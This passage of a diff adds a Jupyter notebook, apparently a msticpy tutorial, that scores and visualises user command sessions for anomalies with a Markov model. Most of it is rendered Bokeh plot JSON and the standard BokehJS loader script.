13:58:13+00:00\",\"2020-05-19 14:01:02+00:00\",\"2020-05-19 14:06:06+00:00\",\"2020-05-19 14:27:14+00:00\",\"2020-05-19 14:30:31+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1107\"},\"selection_policy\":{\"id\":\"1108\"}},\"id\":\"1062\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1100\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"rarest_window3_likelihood\"}},\"id\":\"1040\",\"type\":\"Circle\"},{\"attributes\":{\"overlay\":{\"id\":\"1069\"},\"x_range\":{\"id\":\"1006\"},\"y_range\":null},\"id\":\"1068\",\"type\":\"RangeTool\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1081\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1095\"},{\"id\":\"1096\"},{\"id\":\"1097\"},{\"id\":\"1098\"},{\"id\":\"1099\"},{\"id\":\"1100\"},{\"id\":\"1101\"},{\"id\":\"1102\"},{\"id\":\"1103\"},{\"id\":\"1104\"},{\"id\":\"1105\"},{\"id\":\"1106\"}]},\"id\":\"1055\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1065\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1052\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1104\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1048\",\"type\":\"DataRange1d\"}],\"root_ids\":[\"1073\"]},\"title\":\"Bokeh Application\",\"version\":\"2.0.2\"}};\n",
+       "  var render_items = [{\"docid\":\"9bce5117-3ac2-45a6-bc53-0069e089c8c3\",\"root_ids\":[\"1073\"],\"roots\":{\"1073\":\"24aa99fd-b167-4c8f-9751-df6897a67ae4\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1073"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# visualise the scored sessions in an interactive timeline plot. \n",
+    "\n",
+    "anomalous.visualise_scored_sessions(\n",
+    "    data_with_scores=modelled_df,\n",
+    "    time_column='TimeGenerated_min',  # this will appear in the x-axis\n",
+    "    score_column='rarest_window3_likelihood',  # this will appear on the y-axis\n",
+    "    window_column='rarest_window3',  # this will represent the session in the tool-tips\n",
+    "    source_columns=['UserId', 'ClientIP']  # specify any additonal columns to appear in the tool-tips\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Now we demonstrate how you can score and visualise your sessions in one go. <a id='score_and_visualise_sessions'></a>\n",
+    "\n",
+    "We will do this for the \"Commands only\" session type.\n",
+    "\n",
+    "But depending on which column you chose as the event_col in the [sessionize_data function](#sessionize_data),\n",
+    "you could set the \"session_column\" parameter in the \"score_and_visualise_sessions\" function below to any of the following:\n",
+    "\n",
+    "1. Operation_list\n",
+    "2. cmd_param_list\n",
+    "3. cmd_param_val_list\n",
+    "\n",
+    "<b>Here are some details about the arguments for the score_and_visualise_sessions function:</b>\n",
+    "\n",
+    "```\n",
+    "Help on function score_and_visualise_sessions in module msticpy.analysis.anomalous_sequence.anomalous:\n",
+    "\n",
+    "score_and_visualise_sessions(data: pandas.core.frame.DataFrame, session_column: str, window_length: int, time_column: str, likelihood_upper_bound: float = None, source_columns: list = None)\n",
+    "\n",
+    "    Model sessions and then produce an interactive timeline visualisation plot.\n",
+    "    \n",
+    "    In particular, the sessions are modelled using a sliding window approach\n",
+    "    within a markov model. The visualisation plot has time on the x-axis and\n",
+    "    the modelled session likelihood metric on the y-axis.\n",
+    "    \n",
+    "    Parameters\n",
+    "    ----------\n",
+    "    data: pd.DataFrame\n",
+    "        Dataframe which contains at least columns for time and sessions\n",
+    "    session_column: str\n",
+    "        name of the column which contains the sessions\n",
+    "        The values in the session column should take one of the following formats:\n",
+    "            examples formats of a session:\n",
+    "            1) ['Set-User', 'Set-Mailbox']\n",
+    "            2) [Cmd(name='Set-User', params={'Identity', 'Force'}),\n",
+    "                Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]\n",
+    "            3) [Cmd(\n",
+    "                    name='Set-User',\n",
+    "                    params={'Identity': 'blahblah', 'Force': 'true'}\n",
+    "                ),\n",
+    "                Cmd(\n",
+    "                    name='Set-Mailbox',\n",
+    "                    params={'Identity': 'blahblah', 'AuditEnabled': 'false'}\n",
+    "                )]\n",
+    "        The Cmd datatype can be accessed from\n",
+    "        seqeunce.utils.data_structures.Cmd\n",
+    "    window_length: int\n",
+    "        length of the sliding window to use when computing the\n",
+    "        likelihood metrics for each session.\n",
+    "    \n",
+    "        This should be set to an integer >= 2.\n",
+    "        Note that sessions which have fewer commands than the chosen\n",
+    "        window_length + 1 will not appear in the visualisation. (The + 1 is\n",
+    "        because we append a dummy `end_token` to each session before starting\n",
+    "        the sliding window, so a session of length 2, would be treated as length\n",
+    "        3)\n",
+    "    time_column: str\n",
+    "        name of the column which contains a timestamp\n",
+    "    likelihood_upper_bound: float, optional\n",
+    "        an optional upper bound on the likelihood metrics for the visualisation\n",
+    "        plot. This can help to zoom in on the more anomalous sessions\n",
+    "    source_columns: list, optional\n",
+    "        An optional list of source columns to include in the tooltips\n",
+    "        in the visualisation.\n",
+    "        Note, the content of each of these columns should be json\n",
+    "        serializable in order to be compatible with the figure\n",
+    "    \n",
+    "    Returns\n",
+    "    -------\n",
+    "    figure\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1326\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"1326\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"1326\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1326\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\": \"ufR9RFnRs6lniiaFvtJziE0YeidtAgBRH6ux2oUItHw5WTvE1zuk9uzhUU/FJXDp\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\": \"8QM/PGWBT+IssZuRcDcjzwIh1mkOmJSoNMmyYDZbCfXJg3Ap1lEvdVgFuSAwhb/J\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\": \"Jm8cH3Rg0P6UeZhVY5cLy1WzKajUT9KImCY+76hEqrcJt59/d8GPvFHjCkYgnSIn\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\": \"Ozhzj+SI7ywm74aOI/UajcWz+C0NjsPunEVyVIrxzYkB+jA+2tUw8x5xJCbVtK5I\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.0.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.0.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1326\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"b74e12c1-f5a6-4178-ad3f-94e42e4c5999\" data-root-id=\"1398\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"518aa18f-5e93-4c9e-b6fb-b6f5a23d63c2\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1328\"},{\"id\":\"1368\"}]},\"id\":\"1398\",\"type\":\"Column\"},{\"attributes\":{\"fill_color\":{\"value\":\"blue\"},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1389\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1349\",\"type\":\"ResetTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1407\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1411\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1418\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1393\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1393\"}]},\"id\":\"1383\",\"type\":\"Toolbar\"},{\"attributes\":{\"below\":[{\"id\":\"1339\"}],\"center\":[{\"id\":\"1342\"},{\"id\":\"1346\"}],\"left\":[{\"id\":\"1343\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"1366\"}],\"title\":{\"id\":\"1329\"},\"toolbar\":{\"id\":\"1353\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1331\"},\"x_scale\":{\"id\":\"1335\"},\"y_range\":{\"id\":\"1333\"},\"y_scale\":{\"id\":\"1337\"}},\"id\":\"1328\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1350\",\"type\":\"SaveTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1347\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1420\"},{\"id\":\"1421\"},{\"id\":\"1422\"},{\"id\":\"1423\"},{\"id\":\"1424\"},{\"id\":\"1425\"},{\"id\":\"1426\"},{\"id\":\"1427\"},{\"id\":\"1428\"},{\"id\":\"1429\"},{\"id\":\"1430\"},{\"id\":\"1431\"}]},\"id\":\"1380\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1352\"}},\"id\":\"1348\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1413\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1343\"},\"dimension\":1,\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_